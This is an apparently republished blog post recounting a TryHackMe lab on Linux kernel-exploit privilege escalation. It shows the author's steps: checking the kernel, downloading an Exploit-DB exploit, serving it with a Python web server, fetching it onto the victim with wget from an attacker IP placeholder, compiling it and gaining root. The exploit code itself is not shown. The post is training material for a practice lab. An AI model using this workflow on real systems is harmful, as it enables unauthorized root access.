Try Hack Me: Linux PrivEsc Complete Steps

Completing the TryHackMe Linux Privilege Escalation labs on the Jr Penetration Tester path has been challenging to me. I thought I needed to write about it. Let’s get started!

I will skip some of the informational part and jump straight to task 5.


This content originally appeared on DEV Community and was authored by Michael Oladele

Completing the TryHackMe Linux Privilege Escalation labs on the Jr Penetration Tester path has been challenging to me. I thought I needed to write about it. Let's get started!

I will skip some of the informational part and jump straight to task 5.

Task 1: Introduction

Task 2: What is Privilege Escalation?

Task 3: Enumeration

It does not matter how you gain the initial foothold, When you land on your target machine the first thing you want to do is Enumeration.

To get the full enumeration steps, head over to TryHackMe Linux Privilege Escalation labs

Now let's dive into the main reason for this article:

Task 5: Privilege Escalation: Kernel Exploits:

This task expects that we escalate our privilege via kernel exploit.

Steps:

  1. Get a foothold into the target system, in this case, we SSH into the target machine from our attack machine with the details provided
  2. We are to escalate through kernel exploit, we need to get the kernel of the machine by running the code below:

uname -a

Image description

  1. Now we have the kernel name, we need to search exploit DB for exploit to use against the victim machine kernel. We are in luck, we found an exploit on exploit DB. In most cases we might have to dig a little more on the internet.

Image description

  1. Click Download to download the exploit to your attacker machine

Image description

  1. The next step is to find a way to get the exploit code to the victim machine. I will be doing this with python3 http server.
  2. On the attacker's machine, run the code below in the same dir you have the file hosted run on port 8080.

python3 -m http.server 8080

  1. Once your server is running on the attacker's machine, on the victim's machine, you will need to get the file with wget. Run the command below on the victim's machine:

wget http://<attacker's_IP: <Port>/<file_name>

Image description

If we check the dir with ls I can see the downloaded file in the dir. On the victim's machine.

  1. After the download, run the command below to compile the C file on the victim's machine.

gcc <filename.c> -o <name_want_to_call_the_compiled_file> -w

  1. Then you need to give writable permission to the compiled file.

If successful, you should see the file name in the dir, then run id to see current user id:

Image description

You can see that we have the regular user at the moment:

  1. Then run the exploit code:

Image description

Now we are root after we run the exploit code:

Image description

Conclusion

This is the end of the first part of this series. Watch out for

Tasks 6 - 12.

I hope this helped someone as this lab really challenged me, but it was so much fun and it felt good to complete it. Anyways, I got through it and now, so have you!

It's Michael


This content originally appeared on DEV Community and was authored by Michael Oladele


Print Share Comment Cite Upload Translate Updates
APA

Michael Oladele | Sciencx (2024-06-30T20:11:31+00:00) Try Hack Me: Linux PrivEsc Complete Steps. Retrieved from https://www.scien.cx/2024/06/30/try-hack-me-linux-privesc-complete-steps/

MLA
" » Try Hack Me: Linux PrivEsc Complete Steps." Michael Oladele | Sciencx - Sunday June 30, 2024, https://www.scien.cx/2024/06/30/try-hack-me-linux-privesc-complete-steps/
HARVARD
Michael Oladele | Sciencx Sunday June 30, 2024 » Try Hack Me: Linux PrivEsc Complete Steps., viewed ,<https://www.scien.cx/2024/06/30/try-hack-me-linux-privesc-complete-steps/>
VANCOUVER
Michael Oladele | Sciencx - » Try Hack Me: Linux PrivEsc Complete Steps. [Internet]. [Accessed ]. Available from: https://www.scien.cx/2024/06/30/try-hack-me-linux-privesc-complete-steps/
CHICAGO
" » Try Hack Me: Linux PrivEsc Complete Steps." Michael Oladele | Sciencx - Accessed . https://www.scien.cx/2024/06/30/try-hack-me-linux-privesc-complete-steps/
IEEE
" » Try Hack Me: Linux PrivEsc Complete Steps." Michael Oladele | Sciencx [Online]. Available: https://www.scien.cx/2024/06/30/try-hack-me-linux-privesc-complete-steps/. [Accessed: ]
rf:citation
» Try Hack Me: Linux PrivEsc Complete Steps | Michael Oladele | Sciencx | https://www.scien.cx/2024/06/30/try-hack-me-linux-privesc-complete-steps/ |

Please log in to upload a file.




There are no updates yet.
Click the Upload button above to add an update.

You must be logged in to translate posts. Please log in or register.